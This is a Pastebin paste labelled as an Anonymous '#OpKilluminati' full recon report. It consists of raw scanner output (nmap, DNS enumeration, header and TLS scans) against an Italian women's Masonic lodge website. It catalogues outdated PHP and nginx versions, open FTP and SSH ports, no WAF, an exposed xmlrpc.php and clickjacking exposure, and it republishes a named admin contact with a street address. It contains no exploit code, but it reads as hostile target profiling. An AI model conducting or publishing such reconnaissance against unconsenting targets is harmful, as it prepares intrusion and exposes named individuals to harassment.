Advertisement
JTSEC1333

Anonymous #OpKilluminati JTSEC Full Recon #8

Sep 25th, 2019
1,303
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 233.05 KB | None | 0 0
  1. ######################################################################################################################################
  2. =======================================================================================================================================
  3. Hostname www.granloggiafemminile.it ISP Telecom Italia
  4. Continent Europe Flag
  5. IT
  6. Country Italy Country Code IT
  7. Region Turin Local time 25 Sep 2019 16:49 CEST
  8. City Turin Postal Code 10121
  9. IP Address 77.238.18.215 Latitude 45.073
  10. Longitude 7.688
  11. =======================================================================================================================================
  12. ######################################################################################################################################
  13. > www.granloggiafemminile.it
  14. Server: 38.132.106.139
  15. Address: 38.132.106.139#53
  16.  
  17. Non-authoritative answer:
  18. www.granloggiafemminile.it canonical name = granloggiafemminile.it.
  19. Name: granloggiafemminile.it
  20. Address: 77.238.18.215
  21. >
  22. #######################################################################################################################################
  23. ********************************************************************
  24. * Please note that the following result could be a subgroup of *
  25. * the data contained in the database. *
  26. * *
  27. * Additional information can be visualized at: *
  28. * http://web-whois.nic.it *
  29. * Privacy Information: http://web-whois.nic.it/privacy *
  30. *********************************************************************
  31.  
  32. Domain: granloggiafemminile.it
  33. Status: ok
  34. Signed: no
  35. Created: 2004-01-19 00:00:00
  36. Last Update: 2019-05-11 01:01:08
  37. Expire Date: 2020-04-25
  38.  
  39. Registrant
  40. Organization: Associazione Culturale Femminile Minerva
  41. Address: Via Antonio Giacomini 26
  42. Firenze
  43. 50132
  44. FI
  45. IT
  46. Created: 2015-04-24 10:03:24
  47. Last Update: 2015-04-24 10:03:24
  48.  
  49. Admin Contact
  50. Name: Ferrari Maria Pia
  51. Address: Via Antonio Giacomini 26
  52. Firenze
  53. 50132
  54. FI
  55. IT
  56. Created: 2015-04-25 01:26:20
  57. Last Update: 2015-04-25 01:26:20
  58.  
  59. Technical Contacts
  60. Name: Advision srl
  61. Address: Corso San Martino 1
  62. torino
  63. 10122
  64. TO
  65. IT
  66. Created: 2015-04-25 01:26:21
  67. Last Update: 2015-04-25 01:26:21
  68.  
  69. Registrar
  70. Organization: Register s.p.a.
  71. Name: REGISTER-REG
  72. Web: http://we.register.it
  73. DNSSEC: no
  74.  
  75.  
  76. Nameservers
  77. ns1.register.it
  78. ns2.register.it
  79.  
  80. ######################################################################################################################################
  81. [+] Target : www.granloggiafemminile.it
  82.  
  83. [+] IP Address : 77.238.18.215
  84.  
  85. [+] Headers :
  86.  
  87. [+] Server : nginx/1.6.2
  88. [+] Date : Wed, 25 Sep 2019 15:11:00 GMT
  89. [+] Content-Type : text/html; charset=UTF-8
  90. [+] Transfer-Encoding : chunked
  91. [+] Connection : keep-alive
  92. [+] Vary : Accept-Encoding
  93. [+] X-Powered-By : PHP/5.4.45-0+deb7u9
  94. [+] Set-Cookie : PHPSESSID=57uf7fm38e4ct45kbt6tpe7m46; path=/, wfvt_2269344563=5d8b838441481; expires=Wed, 25-Sep-2019 15:41:00 GMT; path=/; httponly
  95. [+] Expires : Thu, 19 Nov 1981 08:52:00 GMT
  96. [+] Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  97. [+] Pragma : no-cache
  98. [+] X-Pingback : http://www.granloggiafemminile.it/xmlrpc.php
  99. [+] Link : <http://www.granloggiafemminile.it/>; rel=shortlink
  100. [+] Content-Encoding : gzip
  101.  
  102. [+] SSL Certificate Information :
  103.  
  104. [+] commonName : www.alladv.it
  105. [+] countryName : US
  106. [+] organizationName : DigiCert Inc
  107. [+] organizationalUnitName : www.digicert.com
  108. [+] commonName : RapidSSL RSA CA 2018
  109. [+] Version : 3
  110. [+] Serial Number : 0640D11841CD98104B0CE05DCAE44E71
  111. [+] Not Before : Feb 11 00:00:00 2019 GMT
  112. [+] Not After : Mar 12 12:00:00 2020 GMT
  113. [+] OCSP : ('http://status.rapidssl.com',)
  114. [+] subject Alt Name : (('DNS', 'www.alladv.it'), ('DNS', 'alladv.it'))
  115. [+] CA Issuers : ('http://cacerts.rapidssl.com/RapidSSLRSACA2018.crt',)
  116. [+] CRL Distribution Points : ('http://cdp.rapidssl.com/RapidSSLRSACA2018.crl',)
  117.  
  118. [+] Whois Lookup :
  119.  
  120. [+] NIR : None
  121. [+] ASN Registry : ripencc
  122. [+] ASN : 20746
  123. [+] ASN CIDR : 77.238.16.0/21
  124. [+] ASN Country Code : IT
  125. [+] ASN Date : 2007-02-08
  126. [+] ASN Description : ASN-IDC T.NO.OM.I.NC, IT
  127. [+] cidr : 77.238.18.128/25
  128. [+] name : TREPUNTOSEI
  129. [+] handle : ITR2-RIPE
  130. [+] range : 77.238.18.128 - 77.238.18.255
  131. [+] description : webservers TREPUNTOSEI
  132. [+] country : IT
  133. [+] state : None
  134. [+] city : None
  135. [+] address : Telecom Italia S.p.A.
  136. Via Negri, 1 Milano - 20123
  137. Italy
  138. [+] postal_code : None
  139. [+] emails : ['ripe-noc@telecomitalia.it', 'abuse-ripe@telecomitalia.it']
  140. [+] created : 2010-01-13T14:40:35Z
  141. [+] updated : 2015-11-16T11:55:44Z
  142.  
  143. [+] Crawling Target...
  144.  
  145. [+] Looking for robots.txt........[ Not Found ]
  146. [+] Looking for sitemap.xml.......[ Not Found ]
  147. [+] Extracting CSS Links..........[ 26 ]
  148. [+] Extracting Javascript Links...[ 45 ]
  149. [+] Extracting Internal Links.....[ 17 ]
  150. [+] Extracting External Links.....[ 0 ]
  151. [+] Extracting Images.............[ 10 ]
  152.  
  153. [+] Total Links Extracted : 98
  154.  
  155. [+] Dumping Links in /opt/FinalRecon/dumps/www.granloggiafemminile.it.dump
  156. [+] Completed!
  157. #######################################################################################################################################
  158. [+] Starting At 2019-09-25 11:11:07.103287
  159. [+] Collecting Information On: http://www.granloggiafemminile.it/
  160. [#] Status: 200
  161. --------------------------------------------------
  162. [#] Web Server Detected: nginx/1.6.2
  163. [#] X-Powered-By: PHP/5.4.45-0+deb7u9
  164. [!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
  165. - Server: nginx/1.6.2
  166. - Date: Wed, 25 Sep 2019 15:11:04 GMT
  167. - Content-Type: text/html; charset=UTF-8
  168. - Transfer-Encoding: chunked
  169. - Connection: keep-alive
  170. - Vary: Accept-Encoding
  171. - X-Powered-By: PHP/5.4.45-0+deb7u9
  172. - Set-Cookie: PHPSESSID=jdulhmcvkq62g6qc5vbjs60uh6; path=/, wfvt_2269344563=5d8b8387c6cd8; expires=Wed, 25-Sep-2019 15:41:03 GMT; path=/; httponly
  173. - Expires: Thu, 19 Nov 1981 08:52:00 GMT
  174. - Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  175. - Pragma: no-cache
  176. - X-Pingback: http://www.granloggiafemminile.it/xmlrpc.php
  177. - Link: <http://www.granloggiafemminile.it/>; rel=shortlink
  178. - Content-Encoding: gzip
  179. --------------------------------------------------
  180. [#] Finding Location..!
  181. [#] as: AS20746 Telecom Italia S.p.A.
  182. [#] city: Turin
  183. [#] country: Italy
  184. [#] countryCode: IT
  185. [#] isp: Telecom Italia S.p.A.
  186. [#] lat: 45.0725
  187. [#] lon: 7.6877
  188. [#] org: Trepuntosei
  189. [#] query: 77.238.18.215
  190. [#] region: 21
  191. [#] regionName: Piedmont
  192. [#] status: success
  193. [#] timezone: Europe/Rome
  194. [#] zip: 10121
  195. --------------------------------------------------
  196. [x] Didn't Detect WAF Presence on: http://www.granloggiafemminile.it/
  197. --------------------------------------------------
  198. [#] Starting Reverse DNS
  199. [-] Failed ! Fail
  200. --------------------------------------------------
  201. [!] Scanning Open Port
  202. [#] 80/tcp open http
  203. [#] 443/tcp open https
  204. --------------------------------------------------
  205. [+] Collecting Information Disclosure!
  206. [#] Detecting sitemap.xml file
  207. [-] sitemap.xml file not Found!?
  208. [#] Detecting robots.txt file
  209. [-] robots.txt file not Found!?
  210. [#] Detecting GNU Mailman
  211. [-] GNU Mailman App Not Detected!?
  212. --------------------------------------------------
  213. [+] Crawling Url Parameter On: http://www.granloggiafemminile.it/
  214. --------------------------------------------------
  215. [#] Searching Html Form !
  216. [+] Html Form Discovered
  217. [#] action: http://www.granloggiafemminile.it/
  218. [#] class: None
  219. [#] id: search
  220. [#] method: None
  221. --------------------------------------------------
  222. [!] Found 1 dom parameter
  223. [#] http://www.granloggiafemminile.it//#
  224. --------------------------------------------------
  225. [!] 2 Internal Dynamic Parameter Discovered
  226. [+] http://www.granloggiafemminile.it/calendario-eventi/?ical=1
  227. [+] http://www.granloggiafemminile.it/xmlrpc.php?rsd
  228. --------------------------------------------------
  229. [-] No external Dynamic Paramter Found!?
  230. --------------------------------------------------
  231. [!] 56 Internal links Discovered
  232. [+] http://www.granloggiafemminile.it/xmlrpc.php
  233. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/css/ie9.css
  234. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/css/jackbox-ie8.css
  235. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/css/ie.css
  236. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/css/jackbox-ie9.css
  237. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello-ie7.css
  238. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/fav.ico
  239. [+] http://www.granloggiafemminile.it/wp-content/themes/candidate/fav.ico
  240. [+] http://www.granloggiafemminile.it/feed
  241. [+] http://www.granloggiafemminile.it/comments/feed
  242. [+] http://www.granloggiafemminile.it/wp-includes/wlwmanifest.xml
  243. [+] http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/css/vc-ie8.css
  244. [+] http://www.granloggiafemminile.it/
  245. [+] http://www.granloggiafemminile.it/
  246. [+] http://www.granloggiafemminile.it/i-nostri-principi
  247. [+] http://www.granloggiafemminile.it/i-nostri-principi
  248. [+] http://www.granloggiafemminile.it/storia/la-storia-glmfi
  249. [+] http://www.granloggiafemminile.it/storia/la-storia-glmfi
  250. [+] http://www.granloggiafemminile.it/storia/le-gm
  251. [+] http://www.granloggiafemminile.it/storia/allocuzioni
  252. [+] http://www.granloggiafemminile.it/attivita-estere/climaf
  253. [+] http://www.granloggiafemminile.it/attivita-estere/climaf
  254. [+] http://www.granloggiafemminile.it/attivita-estere/clipsas
  255. [+] http://www.granloggiafemminile.it/attivita-estere/umm
  256. [+] http://www.granloggiafemminile.it/contatti
  257. [+] http://www.granloggiafemminile.it/glossario
  258. [+] http://www.granloggiafemminile.it//il-nostro-calendario-eventi
  259. [+] http://www.granloggiafemminile.it///category/notizie
  260. [+] http://www.granloggiafemminile.it///le-logge
  261. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  262. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  263. [+] http://www.granloggiafemminile.it/author/alladv
  264. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  265. [+] http://www.granloggiafemminile.it/evento/lurlo-silenzioso-la-violenza-di-genere
  266. [+] http://www.granloggiafemminile.it///il-nostro-calendario-eventi
  267. [+] http://www.granloggiafemminile.it/notizie/glmfi-chiusura-del-convento-annuale-firenze-19-10-19
  268. [+] http://www.granloggiafemminile.it/notizie/glmfi-chiusura-del-convento-annuale-firenze-19-10-19
  269. [+] http://www.granloggiafemminile.it/author/alladv
  270. [+] http://www.granloggiafemminile.it/notizie/glmfi-chiusura-del-convento-annuale-firenze-19-10-19
  271. [+] http://www.granloggiafemminile.it/notizie/lurlo-silenzioso-la-violenza-di-genere-ferrara-12-10-2019
  272. [+] http://www.granloggiafemminile.it/notizie/lurlo-silenzioso-la-violenza-di-genere-ferrara-12-10-2019
  273. [+] http://www.granloggiafemminile.it/author/alladv
  274. [+] http://www.granloggiafemminile.it/notizie/lurlo-silenzioso-la-violenza-di-genere-ferrara-12-10-2019
  275. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  276. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  277. [+] http://www.granloggiafemminile.it/author/alladv
  278. [+] http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  279. [+] http://www.granloggiafemminile.it/notizie/conferenza-di-vincenzo-gallucci-roma-25-maggio-2019
  280. [+] http://www.granloggiafemminile.it/notizie/conferenza-di-vincenzo-gallucci-roma-25-maggio-2019
  281. [+] http://www.granloggiafemminile.it/author/alladv
  282. [+] http://www.granloggiafemminile.it/notizie/conferenza-di-vincenzo-gallucci-roma-25-maggio-2019
  283. [+] http://www.granloggiafemminile.it///glossario
  284. [+] http://www.granloggiafemminile.it///i-nostri-principi
  285. [+] http://www.granloggiafemminile.it///contatti
  286. [+] http://www.granloggiafemminile.it/informativa-sui-cookie
  287. [+] http://www.granloggiafemminile.it//javascript:void(0);
  288. --------------------------------------------------
  289. [!] 1 External links Discovered
  290. [#] http://gmpg.org/xfn/11
  291. --------------------------------------------------
  292. [#] Mapping Subdomain..
  293. [!] Found 1 Subdomain
  294. - granloggiafemminile.it
  295. --------------------------------------------------
  296. [!] Done At 2019-09-25 11:11:52.294801
  297. ######################################################################################################################################
  298. [i] Scanning Site: http://www.granloggiafemminile.it
  299.  
  300.  
  301.  
  302. B A S I C I N F O
  303. ====================
  304.  
  305.  
  306. [+] Site Title: Gran Loggia Massonica Femminile D&#039;Italia | Libertà Uguaglianza Fratellanza Gran Loggia Massonica Femminile D&#039;Italia- Libertà Uguaglianza Fratellanza
  307. [+] IP address: 77.238.18.215
  308. [+] Web Server: nginx/1.6.2
  309. [+] CMS: WordPress
  310. [+] Cloudflare: Not Detected
  311. [+] Robots File: Could NOT Find robots.txt!
  312.  
  313.  
  314.  
  315.  
  316. W H O I S L O O K U P
  317. ========================
  318.  
  319.  
  320. *********************************************************************
  321. * Please note that the following result could be a subgroup of *
  322. * the data contained in the database. *
  323. * *
  324. * Additional information can be visualized at: *
  325. * http://web-whois.nic.it *
  326. * Privacy Information: http://web-whois.nic.it/privacy *
  327. *********************************************************************
  328.  
  329. Domain: granloggiafemminile.it
  330. Status: ok
  331. Signed: no
  332. Created: 2004-01-19 00:00:00
  333. Last Update: 2019-05-11 01:01:08
  334. Expire Date: 2020-04-25
  335.  
  336. Registrant
  337. Organization: Associazione Culturale Femminile Minerva
  338. Address: Via Antonio Giacomini 26
  339. Firenze
  340. 50132
  341. FI
  342. IT
  343. Created: 2015-04-24 10:03:24
  344. Last Update: 2015-04-24 10:03:24
  345.  
  346. Admin Contact
  347. Name: Ferrari Maria Pia
  348. Address: Via Antonio Giacomini 26
  349. Firenze
  350. 50132
  351. FI
  352. IT
  353. Created: 2015-04-25 01:26:20
  354. Last Update: 2015-04-25 01:26:20
  355.  
  356. Technical Contacts
  357. Name: Advision srl
  358. Address: Corso San Martino 1
  359. torino
  360. 10122
  361. TO
  362. IT
  363. Created: 2015-04-25 01:26:21
  364. Last Update: 2015-04-25 01:26:21
  365.  
  366. Registrar
  367. Organization: Register s.p.a.
  368. Name: REGISTER-REG
  369. Web: http://we.register.it
  370. DNSSEC: no
  371.  
  372.  
  373. Nameservers
  374. ns1.register.it
  375. ns2.register.it
  376.  
  377.  
  378.  
  379.  
  380.  
  381.  
  382. G E O I P L O O K U P
  383. =========================
  384.  
  385. [i] IP Address: 77.238.18.215
  386. [i] Country: Italy
  387. [i] State: Turin
  388. [i] City: Turin
  389. [i] Latitude: 45.0725
  390. [i] Longitude: 7.6876999999999995
  391.  
  392.  
  393.  
  394.  
  395. H T T P H E A D E R S
  396. =======================
  397.  
  398.  
  399. [i] HTTP/1.1 200 OK
  400. [i] Server: nginx/1.6.2
  401. [i] Date: Wed, 25 Sep 2019 15:11:36 GMT
  402. [i] Content-Type: text/html; charset=UTF-8
  403. [i] Connection: close
  404. [i] Vary: Accept-Encoding
  405. [i] X-Powered-By: PHP/5.4.45-0+deb7u9
  406. [i] Set-Cookie: PHPSESSID=119h01qlo1lrgpo47ssmoa88i2; path=/
  407. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  408. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  409. [i] Pragma: no-cache
  410. [i] Set-Cookie: wfvt_2269344563=5d8b83a7511e4; expires=Wed, 25-Sep-2019 15:41:35 GMT; path=/; httponly
  411. [i] X-Pingback: http://www.granloggiafemminile.it/xmlrpc.php
  412. [i] Link: <http://www.granloggiafemminile.it/>; rel=shortlink
  413.  
  414.  
  415.  
  416.  
  417. D N S L O O K U P
  418. ===================
  419.  
  420. granloggiafemminile.it. 899 IN A 77.238.18.215
  421. granloggiafemminile.it. 899 IN NS ns1.register.it.
  422. granloggiafemminile.it. 899 IN NS ns2.register.it.
  423. granloggiafemminile.it. 899 IN SOA ns1.register.it. hostmaster.register.it. 2018011602 10800 3600 604800 86400
  424. granloggiafemminile.it. 899 IN MX 10 mail.register.it.
  425.  
  426.  
  427.  
  428.  
  429. S U B N E T C A L C U L A T I O N
  430. ====================================
  431.  
  432. Address = 77.238.18.215
  433. Network = 77.238.18.215 / 32
  434. Netmask = 255.255.255.255
  435. Broadcast = not needed on Point-to-Point links
  436. Wildcard Mask = 0.0.0.0
  437. Hosts Bits = 0
  438. Max. Hosts = 1 (2^0 - 0)
  439. Host Range = { 77.238.18.215 - 77.238.18.215 }
  440.  
  441.  
  442.  
  443. N M A P P O R T S C A N
  444. ============================
  445.  
  446. Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-25 15:11 UTC
  447. Nmap scan report for granloggiafemminile.it (77.238.18.215)
  448. Host is up (0.10s latency).
  449. rDNS record for 77.238.18.215: host1.4marketing.it
  450.  
  451. PORT STATE SERVICE
  452. 21/tcp open ftp
  453. 22/tcp open ssh
  454. 23/tcp closed telnet
  455. 80/tcp open http
  456. 110/tcp closed pop3
  457. 143/tcp closed imap
  458. 443/tcp open https
  459. 3389/tcp closed ms-wbt-server
  460.  
  461. Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
  462. ######################################################################################################################################
  463. Trying "granloggiafemminile.it"
  464. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16182
  465. ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 3
  466.  
  467. ;; QUESTION SECTION:
  468. ;granloggiafemminile.it. IN ANY
  469.  
  470. ;; ANSWER SECTION:
  471. granloggiafemminile.it. 900 IN MX 10 mail.register.it.
  472. granloggiafemminile.it. 900 IN SOA ns1.register.it. hostmaster.register.it. 2018011602 10800 3600 604800 86400
  473. granloggiafemminile.it. 900 IN A 77.238.18.215
  474. granloggiafemminile.it. 900 IN NS ns1.register.it.
  475. granloggiafemminile.it. 900 IN NS ns2.register.it.
  476.  
  477. ;; AUTHORITY SECTION:
  478. granloggiafemminile.it. 900 IN NS ns2.register.it.
  479. granloggiafemminile.it. 900 IN NS ns1.register.it.
  480.  
  481. ;; ADDITIONAL SECTION:
  482. mail.register.it. 33965 IN A 195.110.124.132
  483. ns1.register.it. 8369 IN A 195.110.124.140
  484. ns2.register.it. 8369 IN A 195.7.227.1
  485.  
  486. Received 245 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 301 ms
  487. #######################################################################################################################################
  488.  
  489. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace granloggiafemminile.it
  490. ;; global options: +cmd
  491. . 85187 IN NS d.root-servers.net.
  492. . 85187 IN NS e.root-servers.net.
  493. . 85187 IN NS a.root-servers.net.
  494. . 85187 IN NS b.root-servers.net.
  495. . 85187 IN NS i.root-servers.net.
  496. . 85187 IN NS h.root-servers.net.
  497. . 85187 IN NS l.root-servers.net.
  498. . 85187 IN NS f.root-servers.net.
  499. . 85187 IN NS m.root-servers.net.
  500. . 85187 IN NS g.root-servers.net.
  501. . 85187 IN NS j.root-servers.net.
  502. . 85187 IN NS c.root-servers.net.
  503. . 85187 IN NS k.root-servers.net.
  504. . 85187 IN RRSIG NS 8 0 518400 20191008050000 20190925040000 59944 . UpM/XFeNPT57BwFJUOnypvsZ9rPj7QQHIJaos+Ij7B6XaBToz1CRQsHc zy5XtauLknSGshqy5KC9BNT4l7x18S41F71I2cyM4y1D0mZfISoSZvQO 0wme0rElcDc5o0HzB9ukEdObh9I+CjlbOT6xQ/YmJ/UVRqwCbDxwQpBE JQ8bdZm3s5HKxr1qPDGti7YwEIYW4LFet6mkJRFOgwiBl+v23iUAxuR2 r/poX29wXk5l2BSTFNFCsG0Ue0b1KI/YLJO0PLzw5EzDM+IHMg60kDyV R25CIoVhEvKfz/sZeSbu9S3LmOc/uCMlwV5ndBcewmeTqN4NQCFA9IZH DyIVSQ==
  505. ;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 88 ms
  506.  
  507. it. 172800 IN NS a.dns.it.
  508. it. 172800 IN NS m.dns.it.
  509. it. 172800 IN NS r.dns.it.
  510. it. 172800 IN NS s.dns.it.
  511. it. 172800 IN NS dns.nic.it.
  512. it. 172800 IN NS nameserver.cnr.it.
  513. it. 86400 IN DS 41901 10 2 47F7F7BA21E48591F6172EED13E35B66B93AD9F2880FC9BADA64F68C E28EBB90
  514. it. 86400 IN RRSIG DS 8 1 86400 20191008050000 20190925040000 59944 . jJaaDJGjtrQHdAj0kpe81eEyThZ6Iur4+4Tht29HYff3gEjjAL7YhH1p oZk57Tl3MOY4zuM8VcrfHeROTenAPiBxcuVs+LkpVXZFGJxwZdUX710o xHnFqBpNwfeHh878xeiWY9dz92f3IVm9tf/t/J6LhFoHE1PaUB79afHb Q+EtMLgf2zLuzKI8cyg0VvJazvoZXa0ekLtD9WBA4peuCGrHTYDNu+y4 Dy6dIE0noAb9mi7ojC1tlNhFnpIevQAvvaXeF1AQrs4TncMxkDH5U7bQ 1+x1GKVVpbcTewFgMl3OW5efVAv1xclkv+Sq7LH3NFYTm6A/xj7haQPs xqGcdg==
  515. ;; Received 769 bytes from 199.7.83.42#53(l.root-servers.net) in 140 ms
  516.  
  517. granloggiafemminile.it. 10800 IN NS ns1.register.it.
  518. granloggiafemminile.it. 10800 IN NS ns2.register.it.
  519. GOKA75I8M28U1ILRK61QGMMEVU700IPI.it. 3600 IN NSEC3 1 1 10 4D1FD460BEA3EE41 GOL6QQS32AKBPA8FT4PR6LPHP8E0N97O NS SOA RRSIG DNSKEY NSEC3PARAM
  520. GOKA75I8M28U1ILRK61QGMMEVU700IPI.it. 3600 IN RRSIG NSEC3 10 2 3600 20191025140329 20190925140329 18395 it. miyfynF3BDkQpZVboRwN6JSFbDVezOlJX6q8wGJlGfi9qUf4NRfHZymp kJIQqEfNlM0pps/8WQT3TKsQZnsQLUwvTlY1x7nmp1zX05UjEo/EViaW VQnfNo7QN5SDkNnxqv0VfjwK1eb5GpyVFXD/yHGk4RJojoQ2oznged4U e26WARl1K37msbZccLET3EtToq676htd+tqCgZ2/gcckrrGVBtWXxCAP 8QEpdVVzjL035MjYB9mWtlhHB+VahZvuHig3KxYXCVhtocNFjLJPWBj/ aGQUZzr/FRZUGPpVH9q1mpOr+cx3vvSjLXOheC37ecf4cSru4mUCDUMa NrDSfA==
  521. UT2L55UIS1S3KV0QK27EU4U13JUP7M2B.it. 3600 IN NSEC3 1 1 10 4D1FD460BEA3EE41 UT3VIK1JFCKVR40A7GDA0EB49PDDSVD1 NS DS RRSIG
  522. UT2L55UIS1S3KV0QK27EU4U13JUP7M2B.it. 3600 IN RRSIG NSEC3 10 2 3600 20191025140329 20190925140329 18395 it. Zo+praQTQmUt6Hmmo2tFCduByHi9mInfwgqdmWAA9SR8Jkco03emV6JR f0+HltlOUsSopRkC9K3X+bp4WHPWvGl4lEa64HrLs/rIIipbH6YFxbKc lct+ZTsnk3GqVV90callh0WjnK1cdGjbTNnXPE6oT72Yt6Mvm9lQitud Jq3T70h5bB/LKcIyvXgBmyzyp8HW7VmLZKZ9uFYSoQRl+zH5x7ctM2Z6 dkEQy5Z9mQHd5B4XJH2bFDibRjLo2+C+Y6nldBdRtgxyYYZoMu1DNCBB NCZV080e7Uqiqt69QJBpySjGC0N2TgZOUUbSEm5VE4szJJpeXjLzCSll c65Ncg==
  523. ;; Received 911 bytes from 217.29.76.4#53(m.dns.it) in 149 ms
  524.  
  525. granloggiafemminile.it. 900 IN A 77.238.18.215
  526. ;; Received 67 bytes from 195.7.227.1#53(ns2.register.it) in 124 ms
  527. ######################################################################################################################################
  528. [*] Performing General Enumeration of Domain: granloggiafemminile.it
  529. [-] DNSSEC is not configured for granloggiafemminile.it
  530. [*] SOA ns1.register.it 195.110.124.140
  531. [*] NS ns2.register.it 195.7.227.1
  532. [*] Bind Version for 195.7.227.1 PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  533. [*] NS ns1.register.it 195.110.124.140
  534. [*] Bind Version for 195.110.124.140 PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  535. [*] MX mail.register.it 195.110.124.132
  536. [*] A granloggiafemminile.it 77.238.18.215
  537. [*] Enumerating SRV Records
  538. [*] SRV _autodiscover._tcp.granloggiafemminile.it ms-it.securemail.pro 195.110.124.246 443 10
  539. [+] 1 Records Found
  540. ######################################################################################################################################
  541. [*] Processing domain granloggiafemminile.it
  542. [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2', '192.168.0.1']
  543. [+] Getting nameservers
  544. 195.7.227.1 - ns2.register.it
  545. 195.110.124.140 - ns1.register.it
  546. [-] Zone transfer failed
  547.  
  548. [+] MX records found, added to target list
  549. 10 mail.register.it.
  550.  
  551. [*] Scanning granloggiafemminile.it for A records
  552. 77.238.18.215 - granloggiafemminile.it
  553. 195.110.124.246 - autoconfig.granloggiafemminile.it
  554. 195.110.124.132 - pop.granloggiafemminile.it
  555. 77.238.18.215 - www.granloggiafemminile.it
  556. ######################################################################################################################################
  557.  
  558.  
  559. AVAILABLE PLUGINS
  560. -----------------
  561.  
  562. CertificateInfoPlugin
  563. CompressionPlugin
  564. SessionResumptionPlugin
  565. EarlyDataPlugin
  566. RobotPlugin
  567. OpenSslCipherSuitesPlugin
  568. HeartbleedPlugin
  569. FallbackScsvPlugin
  570. SessionRenegotiationPlugin
  571. OpenSslCcsInjectionPlugin
  572. HttpHeadersPlugin
  573.  
  574.  
  575.  
  576. CHECKING HOST(S) AVAILABILITY
  577. -----------------------------
  578.  
  579. 77.238.18.215:443 => 77.238.18.215
  580.  
  581.  
  582.  
  583.  
  584. SCAN RESULTS FOR 77.238.18.215:443 - 77.238.18.215
  585. --------------------------------------------------
  586.  
  587. * TLSV1_3 Cipher Suites:
  588. Server rejected all cipher suites.
  589.  
  590. * Certificate Information:
  591. Content
  592. SHA1 Fingerprint: e697b089d7b75f1ecdc6d07af1ab7d9b4a384559
  593. Common Name: www.alladv.it
  594. Issuer: RapidSSL RSA CA 2018
  595. Serial Number: 8311915919103861278781175106682244721
  596. Not Before: 2019-02-11 00:00:00
  597. Not After: 2020-03-12 12:00:00
  598. Signature Algorithm: sha256
  599. Public Key Algorithm: RSA
  600. Key Size: 2048
  601. Exponent: 65537 (0x10001)
  602. DNS Subject Alternative Names: ['www.alladv.it', 'alladv.it']
  603.  
  604. Trust
  605. Hostname Validation: FAILED - Certificate does NOT match 77.238.18.215
  606. Android CA Store (9.0.0_r9): OK - Certificate is trusted
  607. Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):OK - Certificate is trusted
  608. Java CA Store (jdk-12.0.1): OK - Certificate is trusted
  609. Mozilla CA Store (2019-03-14): OK - Certificate is trusted
  610. Windows CA Store (2019-05-27): OK - Certificate is trusted
  611. Symantec 2018 Deprecation: WARNING: Certificate distrusted by Google and Mozilla on September 2018
  612. Received Chain: www.alladv.it --> RapidSSL RSA CA 2018
  613. Verified Chain: www.alladv.it --> RapidSSL RSA CA 2018 --> DigiCert Global Root CA
  614. Received Chain Contains Anchor: OK - Anchor certificate not sent
  615. Received Chain Order: OK - Order is valid
  616. Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
  617.  
  618. Extensions
  619. OCSP Must-Staple: NOT SUPPORTED - Extension not found
  620. Certificate Transparency: WARNING - Only 2 SCTs included but Google recommends 3 or more
  621.  
  622. OCSP Stapling
  623. NOT SUPPORTED - Server did not send back an OCSP response
  624.  
  625. * Deflate Compression:
  626. OK - Compression disabled
  627.  
  628. * TLSV1_1 Cipher Suites:
  629. Forward Secrecy OK - Supported
  630. RC4 OK - Not Supported
  631.  
  632. Preferred:
  633. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  634. Accepted:
  635. TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  636. TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  637. TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  638. TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
